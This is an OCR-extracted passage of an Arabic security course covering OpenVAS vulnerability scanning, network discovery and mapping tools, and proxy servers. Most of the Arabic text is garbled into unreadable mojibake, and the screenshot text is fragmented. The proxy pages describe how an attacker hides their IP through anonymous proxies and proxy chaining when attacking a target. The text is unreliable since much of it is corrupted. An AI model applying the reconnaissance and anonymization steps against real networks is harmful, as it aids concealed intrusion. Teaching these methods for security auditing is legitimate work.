Status Reports 



Ta... Ta... Schi 




rru it have OHF support 

ubled -for the c> v ■= n port 
■for a luccExxfijL 



Scan C... EscaL... Crede... Ag... No... Ove... SL... Report Fo... Port... Perfor 



127.0.0.1 Lja uj^j (Enter your server address) f^UJ! jl^jc JU^I -l 

Username ^^ki^JI ^1 JU^I -2 

Password ^ ^ lsj^ JL^t -3 

.Log in U^r^W Ij^lj -4 



o^liJl) fllttl ^fc uiu^l Oli jUj)) OPENVAS - FINDING LOCAL VULNERABILITIES 

<UV ».vw *W i *a» > Jalij ^jc. l— l^al] OpenVAS ~ laJLudj l_a jjoj j^JI 11a ^ . ^ t^i* '^liluj^U ^.uij c _^j3I CjUj jLlxJI ^ jil 

-^Ld ^jfl (jJ^la (jc OpenVAS 4_il^<Jl L_a*jJa]| Jataj .Aaj] 4_iLaC l^fj U jCO 

.(Log in) rJjU ^ ^ A URL ^ ^ http://127.0.0.1:9392 jU ^1 -1 
.scan configs J^j ^ Configuration 4^ ^ -2 



Greenbone Security Assistant - Iceweasel 



Ice weasel v Greenbone Security Assistant 



^ lZ7.0.0.1:9392/omp?cmd=get_tasks&overrides=l&token=b0d74db3-Sbb3-4692-abaf-e097 v C] [[..J v Google 



E 



Greenbone 

Security Assistant 



SB Logged in as User janateba | Logout 

Sun Mar 30 02:12:50 2014 UTC 



Scan Management Asset Management 


Configuration Extras Administration Help 








Tasks 


^ff^Noauto -ref res-h VAp p Ly 


Credentials 




Task 








Escalators 
Schedules 
Port Lists 
Report Formats 
Slaves 

J 










vriaht 2009-2012 bv Greenbone Networks GmbH, www.areenboi-ie.net 
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;l_ujjj31j ^Vl^ CjULiJI ^ o^*-* cJ^-^ * es-^j 4-JjUi3l Scan Configs ^5-^ -laijjaJt a*j -3 
.Local Vulnerabilities jt&j lJj^ U*j Name ^LIUI ^ <>aaill 
^1 ^l^c-Vl ^l^jjj . jL-oIl <LI> ^> Uk^j jLaJI tiA dij^ Empty, static and fast Base 



.Create Scan config^ ^ > ^ - 



f New Scan Config B 


^ j 


Name 

Comment [optional) 
Base 


LocaL Vulnerabilities 

® Empty, static and fast 
O Full and fast 


Create Scan Config 



:Local vulnerabilities s-^h t^^llA^jll j^' oaailt c^l^l ^J^. ^axjII jVl -4 





Name 


Families 


NVTs 




Act ions 




IB 


Total 


Trend 




Full and fast 

[Most IMVT's; optimized by using previously collected information.) 


51 


D 


34475 


□ 


iBBD 


Full and fast ultimate 

(Most NVT's including those that can stop services/hosts; optimized by using previously 
collected information.) 


51 




34475 


□ 


es □ 


Full and very deep 

[Most NVT's; don't trust previously collected information; slow.) 


51 


□ 


34475 






Full and very deep ultimate 

[Most NVT's including those that can stop services/hosts; don't trust previously collected 
information; slow.) 


51 


□ 


34475 


□ 


a □ 


Local Vulnerabilities 


0 


□ 


0 


□ 


sago 


empty 

[Empty and static configuration template.) 


0 


□ 


□ 


□ 


ss a 



.Nessus JS* (plug in's) cjtat^yi isy^ J^j ^iMI ^Uill j^-ki -5 

-kj^ ^ Local <^ £ Ctrl + F ^ > ^jh -6 
J£ ^ .Select all NVT's J* j^VI t^j* ^ Local ^ji^ ^jU JS1 -7 



4 Compliance 
4- Credentials 
4- Default Accounts 
4- Denial of Service 
i- FTP 

4- Ubuntu Local Security Checks 

Save Config k» > ^ ^ -8 
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Edit Network Vulnerability Test Families 


1 Family tl'S^ 


NVT's selected 


Trend 


Select all NVT's 


Action 


AIX Local Security Checks 


0 of 1 


®DoD 




s 


Brute force attacks 


□ of 8 


oQ ®Q 


□ 


s 


Buffer overflow 


□ of 491 


oE3 ®Q 


□ 


s 


CISCO 


0 of 14 


oQ®D 


□ 


B 


CentOS Local Security Checks 


0 of 2082 


oQ ®D 




Q 


Compliance 


0 of 4 


oQ ®D 


□ 


B 


Databases 


0 of 115 


oQ ®Q 


□ 


B 


Debian Local Security Checks 


0 of 2899 


oQ ®Q 




B 


Default Accounts 


□ of 68 


oQ ®D 


□ 


B 


Denial of Service 


0 of 873 


oQ ®D 


□ 


B 


FTP 


0 of 168 


oQ ®D 


□ 


B 


Fedora Local Security Checks 


□ of 7389 


oQ®B 




B 



.Target ^ Configuration uVI -9 



Scan Management 


Asset Management 


Configuration 




Extras 


Ad 


ministration 


Help 






▲ 
















; flg-xJ! JU^I J!^U. ^ lJ^a pUSljj ^jIj -10 
Name <jUJI ^ cJ^JI <J^1 - 

; 4_l3U3! (Jjiall j J ikluL HoStS AjUJI ^£ jjjjjJa^ll J^l - 

192.168.0.10 ^^ju»> J^l - 
192.168.0.10492.168.0.115^^ c^jj^V 1 ^ ^ - 

192.168.0.1-20 ojj^ c> - 

(Create Target) Jb* £-11 



New Target 



Name 
Hosts 

Comment [optional] 
Port List 

SSH Credential [optional) 
SMB Credential (optional) 



JANA 



® Manual 
O From file 



LocaLhost 



Browse.. 



ALL IANA assigned TCP and UDP 2012-02-10 



on port 



22 



Create Target j 



: aJUII ft^U fUSllj <New Task ^ | Scan Management -12 
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A <\£ a\\ ^jujI <J^j| 4^- 

,<JjS ^ l^jUijU 11*3 ^ill Local Vulnerabilities 3JLaJI yij <j-aUJt <j-a^i3! ^1^1 _|_ 

. (Create task)^>JI <ija j*l 4- 



New Task 



Name 

Comment (optional) 
Scan Config 

Scan Targets 
Escalator (optional) 
Schedule (optional) 
Slave (optional) 
Observers (optional) 



Noreen 



LocaL VuLnerabiLities 



JANA 



Scan Intensity 

Maximum concurrently executed MVTs per host 
Maximum concurrently scanned hosts 



20 



Create Task 



icPVIS run W lU*j 1$jI&L liaS ^1 Task ^ Scan Management -13 


Tasks 


■■ 


vT-b auto -refresh 0 


i/Ap p Ly overrides 0 






Task IH 


Status 


a 


Reports 


Threat 


Trend 


Actions 


Total 


First 


Last 


Noreen 


I 1 o □□□0HS 



l&All i-U^JalU (j^J <u/j±ljtyOpenVAS - finding network vulnerabilities 

4 Brute force attacks 

4- Buffer overflow 

t CISCO 

4- Compliance 

4- Credentials 

Databases 

4- Default Accounts 

4- Denial of Service 

4- FTP 

4- Finger abuses 

A- Firewalls 

* Gain a shell remotely 
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i- General 

A- Malware 

i- Netware 

4- NMAPNSE 

4- Peer-To-Peer File Sharing 

* Port Scanners 

i- Privilege Escalation 

*t Product Detection 

k RPC 

i- Remote File Access 

4- SMTP Problems 

4- SNMP 

*k Service detection 

i Settings 

4- Wireless services 

^-£1/ JixJllI fJxl ^JxjJoSI Jatiti d^Jl QpenVAS - finding Linux-specific vulnerabilities 

4 Brute force attacks 

4- Buffer overflow 

4- Compliance 

A- Credentials 

4- Databases 

4- Default Accounts 

A- Denial of Service 

I FTP 

4 Finger abuses 

i- Gain a shell remotely 

4- General 

4- Malware 

4- Netware 

* NMAPNSE 
i- Port Scanners 

4- Privilege Escalation 

*k Product Detection 

4 RPC 

4- Remote File Access 

4- SMTP Problems 

4- SNMP 

Service detection 

4- Settings 

i- Wireless services 

4- Web Servers 

J/jfe^ fJxl LftJ/ Ja^L; <^-i// QpenVAS - finding Windows-specific vulnerabilities 

4- Brute force attacks 

4- Buffer overflow 

https://www.facebook.com/tibea2004 A^Ia ^^aa-ua 



80 



4- Compliance 

i- Credentials 

% Databases 

4- Default Accounts 

A- Denial of Service 

J_ FTP 

(t Gain a shell remotely 

4- General 

(t Malware 

^ NMAPNSE 

A- Port Scanners 

4- Privilege Escalation 

*k Product Detection 

4- RPC 

4- Remote File Access 

4- SMTP Problems 

* SNMP 

*t Service detection 

4- Web Servers 

Windows 

4- Windows: Microsoft Bulletins 



NETWORK VULNERABILITY SCANNERS 



a<^ ^jl^ J a& ^umW AS^ill t fljujal l Jalij ^j^j ^ cil^Luj ^1 Cj! j^Vl ^ Network Vulnerability Scanners 

qC* <Jj3 ^ .^tl] tCjllnlajll j jjLalt ialL<J! t^LJl ^l^cj i jLaV! cl^J^ tJjajuSjll ^»Uaj tAj^Luj^U! j! Aj^Loili fiK^^l 

^jll djj^aaII ^Liuujjll l$*5t j c^j^-Vl <— il j^Vl Lpasu Uua ^Openvasj Nessus ^ j ^i^J ^vim^l dj| j^Vl 

Retina CS available at http ://go.eey e.com or http://go.beyondtrust.com/community 

Core Impact Professional available at http ://www.coresecurity .com 

MBS A available at http ://www.microsof t.com 

Shadow Security Scanner available at http ://www.saf ety-lab.com 

Nsauditor Network Security Auditor available at http ://www.nsauditor.com 

Open V AS available at http ://www.open vas.org 

Security Manager Plus available at http ://www.manageengine.com 

Nexpose available at http ://www.rapid7.com 

QualysGuard available at http://www.qualys.com 

Security Auditor's Research Assistant (SARA) available at http ://www-arc.com 
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DRAW NETWORK DIAGRAMS 3.6 



(router) j^l * j&^j 4J-*aJI j* ^ ^-<u.hj *ul .4£jJd3l ^ t^^JI < ^uJl jLaa>JI ^ui ^^ic til^cLaij a£jJo13 



CjI^JI a£jJJ3 S jVijVi^^ l cjUj^JI (mapping tools) ^ j j' (network discovery tool) Jl^VI 

,a£jjoJ cJ^-*^ jj> ^>Jj .Ai^JjaixJl 




BBC 

User 3 UBflr4 ".ap Server 




PHP Server HTTP Server 



FIGURE 3.52: Network Diagram 



Intranet 



w ^ d 

ts#r 1 U IB r 2 File Server A pp Server 

I I I J 



Pre ncy Server 



1 1 1 1 
|| j g 

user -i UMrfl DBS*rwr 



NETWORK DISCOVERY TOOL: LANSurveyor 



http ://www.solarwinds.com 

ILixld diVU^ajVI o^j^ cs-^* U-^ n>i^l ^jc a£jJo3I ^ ^Uijjj c al un^U Ujliii till ^joij LANSurveyor 

^jijjjjjoj '(node) 6 ^- ls^I u^j^ 'u^j^ c^) u^j^ J^-^^ o^j^ OSI 3 <ya31 j 2 <afL3l Ji<i 

Ij^j CjI j^ull L^jI .Microsoft Office Visio ^ ^j^j ^ ^ a<^A\ UU^a jja^ .(router)^ j^^ 

1 ^La ujJ ^alJ ^nJalli ^jC 6^)A3La3I ^^^C jnir t ^aJ CllifLill 4_iLislI jn>^^ Wizard ^ ftl^VI 



si -1 

.Continue with Evaluation <!Lo.jll j^ki Ui«i Aijaj] a**^ ^IjKtj . h ^^Ij (_>«J (ii^' -2 

^^Ic. JasuJall j^ajj (j-a^ill ^iLac I^J Start Scan -lasuJalU ^ jii l^ja <^lj j* ; ^xj -3 

.End Addressj Begin Address IP OLs^ J^^k ^ Create A Network Map lSj=^ 

.Start Network Discovery ^ Jai^JU ^ -4 
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Create A New Network Map 



Network Parameters 



Begin Address 
192.1 88.1 G.1 


End Address 
192.168.16.254 


Enter Next Address H 





(Following router hops requires SNMP router access) 
Routers, Switches and Other SNMP Device Discovery 
5nmp g 5nmPv| Devices -- SNMPvl Community String(s): 
public private 

I I SNMPv2c Devices -- SNMPv2c Community String(s): 

public private 

□ SNMPv3 Devices 

Other IP Service Discovery 

B LAN surveyor Responders 
LAN surveyor Responder Password: 



H I CMP (Ping) 
0 NetBIOS Clients 
H SIP Clients 



Hops 



□ Active D irectory D Cs Authentication. . . 



Mapping Speed 



0 



D 



Configuration Management 

S ave D iscovery Configuration | Load Discovery Configuration... 



Start Network Discovery 



H 


SolarWinds LANsurveyor 


□ 1 


File Edit Manage 


Monitor Report Tools Window Help 








ira SiSiiBBBBLl© 


so la r winds 



For Help, press. F1 



Mapping Progress 



Searching lor P nodes 



Hop 0: 1 92. 1 68. 1 6. 1 56 - 192.1 68. 16.254.. 



SNMP Sends: 


?1C 


SNMP Recefrts: 


1 


ICMP Png Sends: 


1EE 


ICMPRecefrts 


3 


Sitmets Mapped: 


0 


Nodes Mapped: 




Routers Mapped: 


0 


Switches Mapped: 


c 



Last Node Contacted: 



m mLs j^\£ I3 i^aaij Lata ^jJI ^jc ^Lkju a£jJo3I c M ^y^l ^ a*j -6 



https://www.facebook.com/tibea2004 



83 



SolarWinds LAN&urveyor - [Map 1] 



Si File Edit Manage Monitor Report Tools Window Help 



c\ e3 y * - 88 .fe- he a a a a a o 



solarwinds < 



? ® 0 



Network Segments [2] 
IP Addresses (4] 
Domain Names (4] 
Node Name: (4) 
IP Routers (1) 

LAN surveyor Responder Nodes 

SNMP Nodes [1] 

SNMP Switches/Hubs 

SIP [VoIP] Node: 

Layer 2 Nodes 

Active Directory DCs 

Groups 



JANA 
JAWA 
192.1 



SZ.IcS.lc.C - 192.1c 



SAMA 
SAMA 
192.16316.73 



-TEBA 
-TEBA 

16.71 



1c. 2^5 



5NMP 



EC 

192.163.16.1 



i f. ki f. kinnccn 



For Help, press F1 



NETWORK DISCOVERY TOOL: OPMANAGER 

http ://www.manageengine.com : j^-a-JI 



jj! ja jic tillij *bVlj *Lk^Vl ^ajJ Sjbi fjft\j a£^JI *b1 SjbV sbi ^LuiVl ^ OpManager 

^IjaJljVolP call paths ^ajU^JI jlj^ ^switches 'WAN caiL-aj 'router s Ji* <^t^ IT cjUjkJI L^j]j£j 




: OpManager ^>j^> <> o**-} ^ 
IPu 1 s J b ! - 

A<*u*\\ pbVl JJjUS ^1 

Exchange ^SL ial 
Active directory 
Hyper-V 
.SQL - 
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NETWORK DISCOVERY TOOL: Network View 



a b a e s q a 



■ r u a 



/ 









J9 * L J 



« a o □ a fc 1 



JL^jI s jblj c_fll£&V sbi ^ Network View 

^l^kloib TCP/IP ^ Sj^tj lJL£SI -1 
WMIj NetBIOSj Portsj SNMPj DNS 
NIC j MAC u'j^ jj^J! -2 

>Lul! o-n^j cWMI browser j SNMP MIB browser 4> ^UJ! *£*i!t o^bj ^S^l -5 

NETWORK DISCOVERY TOOL: The Dude 

om : j^-a^ll 

Aj^jj (ciL 4_j^LkJI <JL^jV1 cjI^jjuJ <iaj^k ^jja jj ^ajoajj ^aw a ajc cjI^jjuj <J^.ta s j^-^Vl (j^^^j UjUIj The Dude 

: C5 L Lui CjIJj^I 4> Jjfi <ilUA 

kikkjl) j .nil 
S j^a^U 4jjL^j3I 3_a^Isl!I jl ^ jj c^l <■ Q *n^J 

4 >n>^i^ tf> s 7> i AiLjaj j tiL <j^aLaJl Jajl j^Jl ,ajuijl till ^laliij 

<4U ^ ^1 sj^Vl a^jTCP j 'DNS TCMP < SNMP^Aj - 




inCtocalhost - T te Dude 4 Odf ta j 



rase'' 



IB 



Ovice Owrnvtry 



|KKM N 






| it3 ;md a/n 










- 


-1.:*™ 








MAPPING TOOL: FRIENDLY PINGER 



http ://www.kilievich.com : j^-a^ll 
, j> rt^W j t^j^ajll j tA^jJall Sj^V ^'^^ >>1 VI 5J^juj ^nJaj Friendly Pinger 
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^1 j^Jl c fll un^V a£jJo3I iajl^kJI ^jujj <_£j^j La s^tc .djl^jJoll ^Lj^l -^j^ <Loj!j^ (Network mapping) -lajl^pJI 

• jjjiaul 4_JU3I dUlj^VI iiii Friendly Pinger 
.SjajjJI Sj^i Monitoring -1 
.4£jJd3l C5 ic ^L/jajjjoj (jlc. jl Jj«j^j 4_iLac cj^. lil tiU^lcj Notifies -2 
.^f^l j^^^ * j^' 6 jl jl ^ <y*^ Audits hardware and software -3 

.6^.1 j 6j-<i ^-ia^J J-ftc Ping -4 



Friendly Pinger 

^iUxj ^-aUJI Wizard ^LjL - 1 



.NO ^ -iaijJaj jjc <j <j^aUJt ^jLj jll o^UIoj tiUUaj Friendly Pinger u' 



r Friendly Pinger [Demo.map] 

Rle tdrt View Ping Motftcabor Scan FWatchcr inventory Help 



* Dew 




Intend M*l 

Short ci* Sm«« 




Wo#kS»*rinn 

(Ifllrltl) 



'1/24/37 00.00:36 



Wizard ^lill <> File -3 




Pinger rDemo.mapl 

Inventcr/ Help 

^ -Xr M & « 



B >■»••<•• 

V*v« At... 



H Sa.eAi Image... Ctrl-E 

d Print... Ctrl ? 

<^Lock.. Ciri-B 
^ Create Setup. . 



S Options . 
jLEriT 



WnfkSlAlinn 



H«b S — 5- 



3' i 

ShtrttC* SHWf 



^^^^^ I 



.Next 
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Local IP address 



The mbal map wi be created by query from DNS-server 
•he information about following IP-addresses: 



10 0 01-20] 



You can specrly an exacter range of scanning to speed up 
ttwopetafon Foi example: 10. 129-1 35. 1-5. 1-10 



□ Tineout 1000 



Tmeout allows to increase searching, 
but you can miss some addresses. 



? Help 



ONext 



X Caned 



B t*Lk f&^jf* £ a£^JI ^ IP ojjU^ o-a^ij wizard ? j% -5 

.Next -kijJal ^ -6 



Wizard 



IP address 


arne 


0 10.0.0 2 


W1N-MSSELCK4K41 




a 10.003 


Windows8 




0 10.0.0.5 


W1N-LXQN3WR3R9M 




□ 10.0.0 7 


WIN-D39MR5HL9E4 





The inquiry is completed. 4 devices found 



Remove tick from devices, which you 
donl want to add on the map 



? ti*P | | «»B«ck Qt 



XCancd 



.Next ^ U£ Wizard <^ ^Jal j^VI cjljblkVI t*S J>\ -7 



Bevces type Workstation 



Address 

O Use IP address 
|* UseDNS-name | 



□ Remove DNS suffix 



Add devices to the new map 
I® Add device? lo the current map | 





I ?u* 




<=Bad 


ONext : 




XCancd 



i^Vl^ FPinger o- 3 ^£^1 ^Ljj^ lP 3 <4j Next ^ > ^ l a*j -8 
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Fit Edit Vl^-vui Ping Norrf icaxl&n Scm FWaccher inveFrmry 


Help 






^ « # 




i^Vl^ 4-1* <Uiudi<JI ^-Ajlill ^ scan ^» > ^ ^ l£ ^ j^VI -^j^ ^ ^ 




.Scan wizard ^ o-^^l J^LiS o^j^ ^ ^ 
.AjjlxJI ^ajUII ^ *^ j^. j-<JI Inventory -^i-jjalb tilli ^il 6jHk-<J! jii jn^l s <j^aLk]| Jj - ^ j Cjbl^cVI ^jji 
5- 3?JI ^ a^j .dilc ^ ^1 ^MiVn L$ jlxJI ^ j <LiLi3l j^-laj Inventory ^» > 

:c5^VIS (Operating system) J^ftll (Computer name) jW H ^ cSJ 1 ^ General 



10 
11 

12 
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Invenl 



File Edit View Report Options Help 



€1^11"° 



0 -sia IQ & 



WIN-D39MR5HL9 



_J | EE* Qerteral [ M isc | ^ Hardware | Eg] Soflwae | JH istor^ | < 



Computer AJser 



Host i 
U.s*t name 



|WIN-D39MR5HL9E4 



[Administrator 



Windows 



Se^cepack 



[Windows Server 201 2 R eleesg C^ancftdatg PaJacarifcar 



Collection tsne 
Collection time 



8/22/2012 11:22:34 AM 



jjjjux^l jl^a. C5 1& jajlxJI jjj^II CjULJI ^Ikjj MAC uL^j IP ub^ ^ lP 3 ^ Misc a^j*^! -13 

.Jjj^a£i3lj ajjLJI jj jji^ll ^ lP 3 ^*^ Hardware ^ j-*?^-14 
_ jUa^ll jj jn^l jt$j> ^^Jc ajjIa!) djlqjiUill ^.a^ ^jiajxj Software 



- - 1 5 



Scanning Devices in a Network Using The Dude 



http://www.mikrotik.com/thedude.php 
<iL (j^aLkl! a£jjuo13 <iLjj^. ^jojjj ^ajlj ? (subnet) cS^j <J^ J ^jl j*ty^)$^VI °; <Ljiaj ^jIj (j^flaj Dude 

.c*L a L^aLaJl Sjtal ^ t^lSjjJa (jjmVi ^^ic J-<i3u j (jjj^ j& Dude 
I^Vl^ 4_loujj3I 4_uiLuJI j^Jalia <ic djjjlxJI cJ^-^> ^ b* ujj 4j ^j^aLiJI Wizard -^-^ cJ^-^> o." ( ^ - 1 



»s* admin@localhost - The Dude 4.0beta3 

] I Preferences ~| | O Local Server | f Hdp | 
Settings ^ E> M " 



Contents 



.Address Lists 
£ Admins 
Agents 
Charts 
Devices 
Rles 
F^ Functions 
F^ History Actions 
EH Links 
- Q Logs 

O Action 
£7 Debug 
O Event 
Syslog 
F^ Mib Nodes 
B H Network Maps 



r^^l I Plover || -Tools | [x][Q 



Client : rx 358 bps / tx 1 97 bps Server: rx 21 G bps /be 392 .. 



Device Discovery ub^ ^ csj^ jj^ cs^j 2 ^ j Aj^jM Discover ^ > -2 
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Device Discovery 


cm 


General Services Device Types Advanced 


| Discover | 


| | Enter subnet number you want to scan for devices 


| Cancel | 


Scan Networks : 1 1 92. 1 68. 1 6.0/24 $ 




Agent: | default _lJ |_5 1 1 DDD I 




I - Add Networks To Auto Scan 




Black List: (none _lJ |_5 ILhEe] 




Device Name Preference: |DNS. SNMP. NETBIOS. IP 




Discovery Mode: <* fast (scan by ping) f~" reliable [scan each service) 




0 

Recursive Hops: |0 _r] ^ — { { { { { { ^ ^ r 

0246 3 10 14 2050 




\~ Layout Map After Discovery Complete 





Default l$I ja US Agent Jj^VI J*^ o 
DNS, SNMP, NETBIOS, IP lW^ Device Name Preference J^l jL^I o 
i^)3l <jujLaJ! ^tjUll jj^-^ ^ ^jUtj ^ jlja Discover 1 Sail 1 ^ j£j ^l^ijVI ^su o 



.1 fh« Hurtr 4Xtbn.il 




: ^Vl£ cjljUkJI t> j^l 4^ -oli Local Jc Ia^JL -5 







Preferences 


O Local Server 


Help 




n 


! CONTROL -> WWW 






Settings 


IE 


Local UDJdEI 






Contents 


/% 1 


l+HH 




Settings Discover T Tools 




H 


\||0 l^yer: jlirit 



NETWORK DISCOVERY AND MAPPING TOOLS 

D^-^-V! CjI£1^jj( c ftjjj£ f^lc tiliC-LmJ Igil .<iL <j^LkJl <JL^jV! A^juJ 4_IaJ^Jl (jla^su (ill ^ajujJ 4£jjuo]| iajl^k ^jojJJ L_flLaLi£l dllj^l 

: JL^iV! UUo aJc£\ cjIj/VI 
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LANState available at http://www.10-strike.com 

lpsonar available at http ://www.lumeta.com 

CartoReso available at http ://cartoreso.campus.ecp.f r 

Switch Center Enterprise available at http ://www.Ian-secure.com 

HP Network Node Manager i Software available at http://www8.hp.com 

NetMapper available at http ://www.opnet.com 

NetBrain Enterprise Suite available at http ://www.netbraintech.com 

Spiceworks-Network Mapper available at http://www.spiceworks.com 

NetCrunch available at http ://www.adremsof t.com 



(PREPARE PROXY) t^jj^l ^\ 3.7 



\ a A A ^jj i *aj<j ^joi^j^JI/^^^ j]| A-iaj£ ajudflll I^A 1 * a - ,^JJ^A t . il^j Liajlj .liLa j^Ij^q Jl <J jj^ jll (jja^l g Jl 1 g ^ Iklujj 

?PROXY U 

^ill laJ > o jll Liajl J ^ J > ^ I— ^^^J^ J> 1 > ^ ^ uJ> lS^-JI [tg-Lo 4_lJ^sJl ^5^-*-* Jl ^.JJJ PrOXy 4-J^ 

^ixJj ^jjjalla a (jjjitL ^jlj laJL (jjj^a^jui ^JJJ l^jjuiLixi I jl ^.^)JJ c£^l ^^)1LJI 1 - taJ) (^^-i*^ 4_}jjuiJ (jx» -^^J-^ 

m (J jjjoiJI j <JjLuJ! (jll UaJjoj j (jj^J jJJj£juJl jl ( . 1^1 -\\\ Liajl 

^Jlsu a£jjoJ! IIluj ^jjj ^31 4_ilkUI ^c^l^JI cA Ala ^g^ijj laj > o jll £cxAi^)i3! Jc (3^^ Proxy -Jl u!^ ^-?^^>^ J *<^J^I 

<Jjjj 4_ilc JjAxjII ^JalaiJ 4£jjual3 tJla 4_ILujjI JL^. Jj .^iJl jl *^)3l (j^^a (jC ^kl lijj^aJ t flj - gaJJ ^al 4£jjual3 lfrfr^.jJ (_£JJJ CAJUl 
J ^^ijalJj .(_£^)^.l <9J^)iaJ ^)Jl ^JaluJj jl JkUl £C-<ili^)il3 <J^lcl <Jjfj ^)3l Jc JjAxjll ^ 1 kLj ^ c _ 5 joJI (JJ^J .^^i J^^^J ^J^Jjl 

t^jia ^ a£jJo3U JL^ajl ^jUr> ^li ^UlUj ,Lo f-^g^ t ; ill laj L-flj > ^alj V j CjUi^k <jV .Proxy Server ^ LSaJI 

PROXY SERVER Jl ISU J 

-C5 ^jUJI J jj^a jll tiL 3^UJI aJ^JI a£jj^13 sbt£ ^^juoS jjJI J^"..n dii^ <.4Jj**. jl^ Ja£Lumj -1 
JL^iVI jjj^II Sj^i c> ^UuJl C;r ^jjJI ^l^au^l <j| tip address multiplexer <i J^*^ -2 



(anonymous surfing) cr^l -3 

<j* cjVL^V! j cj^j La 11a j ^ jSa Jl Ajjj^aj I^js j jj^aUl t (f iltration) A^LaaII -4 

^ ga^Lo ^^joi^j^J ^a^l j^. ~\ laJLujI ;^ "<AjujLLq J;1C." ^1 ^Jl jl djU!)lcyi ^1 J-J^J ^^^V^ 

.Bandwidth -S^aJ -6 



(PROXY SERVER)J^jJI ^ J^u uLS ^> Ujpj 

^lla ^1 tiL (j-aUJl uJlflJl J^JJ V jl t(4jaij^JI o^J lillLJI) C5 lxi3l ^UJI/^UI ^ S-lJj <^ij^a L-J1J ^^ju^jjJI ^l^klujl Alo 
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Proxy Server 




^ It 'i 



Attacker 



Target Organization 



(mask his IP address) <i IP u'j^ u\* 'l^jji %icL** ^ j^JI ^ <tal ^1 <>- < 



-2 
-3 



^ Wq^l ^jl jixl\ V-jj i>5 jai£jji3l ^j-<i ^a&j j>i^o ^jl jjc ^ 4_i^jja3l ^^Lkil (log file) l!^ ' ^taLo laj ^x^l^JI -1 
<J jl! ^ j.^>.q^ jjc. s^lc (Jj^j C5^^J (remotely) c5^>^^^ j - ^^ ^j^ j^j ^l^WI a£jjoJI ^1 J jll 

(USE OF PROXIES FOR ATTACK) ?j^S J <^jj^ 

C;? ijLJI IP jIjjc pU^j ^ J^xj (Anonymous proxies) Jj^J^ c^jj^ . W) Jj^j^^ ^^AjjA] j±£ ^ 

: (Anonymous proxies) Jj^J^ yr^jj^ c> .U^j^ ^ v^ni^ t ^JL ^S\jA\ ^> (CjUjixJI U j^j) 

cjI^JI ^ U j^j (Non-Anonymous proxies) ^^jj^^ ^1 aJLjU! (jAh l^mj jl^j 

. (web-based anonymizers)M^ 

_4_j ^aL^Jl j^j^aII IP (j! jjc. J j^. CjUi jlx-d cJ^^ ^^LkJ3 J^juJI djliLo q\ Lo£ ^fiiH ^jia^suj 




Attacker 



Target 



.ClljjljV! 4SliA ^glc J * ^jj^J ^.1^<JI C5 JaxJjaj li^ .^fiill jia^. 






Attacker 



Logged Proxy 



Target 
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(proxy chaining technique) cs-^ jj^ JjuJjuij ^vimj 

cj^Jl l-J^J <> ^ISjVl c> ^>^1 f^-^ Ljjl^l j& (proxy chaining technique) 




9 

Attacker 





pia] KM 

Mexico Toronto Dubai 






« b ~ 

m p« wm 

Israel Philippines London 





Target 



Using ProMV Chaining 



(PROXY CHAINING) g^jj^l ^52 

^U. J j^j o jj^j (proxy serverl) jj^t '(P r <>xy serverl) 1^$^ jj^ J j^I 

. (proxy server2)2 g^jj^ 
11a (^j&j^i ^1 L-ilUl lS-^j^ ^ ^^jjai^ll ^jj^. cjL* jlx-a < ; illall -i^>^ d**^ '(proxy serverl) 1 (^^j^ 
^jj Ajlgill gi clJ^JI ^UJI Jj^j L5 la k J ^kj <(server3) ls^jj* ^ 4-^1 lUjj c> 




H 

IP: JO.IO.IO.I 

Pact: HD1Z 




ID.IO.ZQ.5 

Port: 3 


H 


> 


IP:3G.H3.L5.4 
Port 8C3I? 



User 



9 










Web Server 



PROXY Tool: PROXY WORKBENCH 



http ://proxy workbench.com 
CjVl^ajl iUilU till £c-gjoij t^qjq^ll diajll ^ <!^U> ^ ^1 CjUUJI lP 3 ^ jj^ Proxy Workbench 

.Socket connection-S ^VijVi^fl t ^ J\ o^j&j CjIjUJI j ^jjIj c>a 4 TCP/IP 

.Socket connection ^ cjI^Vi Ail^l cilj^ ^j^j ^jjU Socket connection-S ^InW^ t 

-C5 iiLJl C^jll ^ <J 3^UJI CjUUJI <jV 'U^Vl pi jJaJl J U^J^^ J L^JJ^ .POP3 J HTTPS 

IfrLl^j] A^JjaJl diUi jlst-d ^A^- ^ ^ »QJ ^^ill J cJi^^ ^ q/ii^l ^aUaj JjoU J^Lk ^ CjLa^JI oi^ (Jlxi ^^^ic 6J^IS (jj^J (jl < ; 1> j cJ j3 JUiL< ^ 

.CjKj/MI oa^i ^ij c aj£ ^il Proxy Workbench ^I^IujI 1 > ^jl t*LLaj .^U^aVI jl ^ j^a dj^. jl£ lij U j 

.cIujjjII a-Aaxj ^aLkJI wizard L - J ^f^^ <Aac> l^j -j 
.options j^-^ ^ Tools j ^j^^ <Ajli3l ^1 ^jj^ j^jjli j 4^ c aj^ala ^1 -2 
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Private Browsing - Mozilla Firefox (Private Browsing) 



File Edit View History Bookmarks 



9 Private Browsing 



Search or enter address 



lools Help 



Downloads Ctrl+J 
Add-ons Ctrl+Shrft+A 
Set Up Sync... 

Web Developer ► 
Page info 
$7 FlashGot ► 
Options 



Google 



P + # * 



"1 



j| jUaJI £^ j^-^ Advanced ajjUI <ajU3I ^aJUII 4JL!d\ Options ^ > ^ 1 a*j -3 

.Setting ^ Network ^ j ^ ^ CjIc a ^jjI c _ 5 ic- ^jii^j <j| 44J 



0 



Options 



<3 



General Tabs Content Applications Privacy Security 



Sy nc 



General Data Choices Network Update Certificates 



Connection 

Configure how Firefox connects to the Internet 



Settings... 



Cached Web Content 

Your web content cache is currently using 252 MB of disk space 
I I Override automatic cache management 

Limit cache to 350 C MB of space 

Offline Web Content and User Data 

Your application cache is currently using 0 bytes of disk space 
[Vl Tell me when a website asks to store data for offline use 
The following websites are allowed to store data for offline use: 



Clear Now 



Help 



Manual Proxy Configuration .Connection setting u'j^' ^ aJL^1\ j^-ki Setting ^ > -4 

iuCte. £±i .8080 (port) ^1 ^ HTTP proxy u» ci^LJI ^j* 11 J* 127.0.0.1 ^Vl ^ £ 

Ok Vit » ^ ^ .Use this proxy server for all protocol j^VI ^ ^» 



Connection Settings 

Configure Proxies, to Access the Internet 
O No proxy 

>.'_.'.' Auto - d etect p roxy setti n g s f o r th i s n etwo rk 
O system proxy settings 
Manual proxy configuration: 



HTTP Proxy: 127.0.0.1 



SSL Proxy: 
FTP Proxy: 
SOCKS Host: 

No Proxy for: 



[^1 Use this proxy server for all protocols 
127. 0.0.1 
127.0.0.1 



3030 Z 



127.0.0.1 

SOCKS v4 



Port: Q 3030 t 
Port Q 3030 t 
Port: 3030 t 



localhost, 127.0.0.1 



Example: .mozilla.org.. . net.nz. 192.163.1.0/24 
(_3 Automatic proxy configuration URL: 



Help 



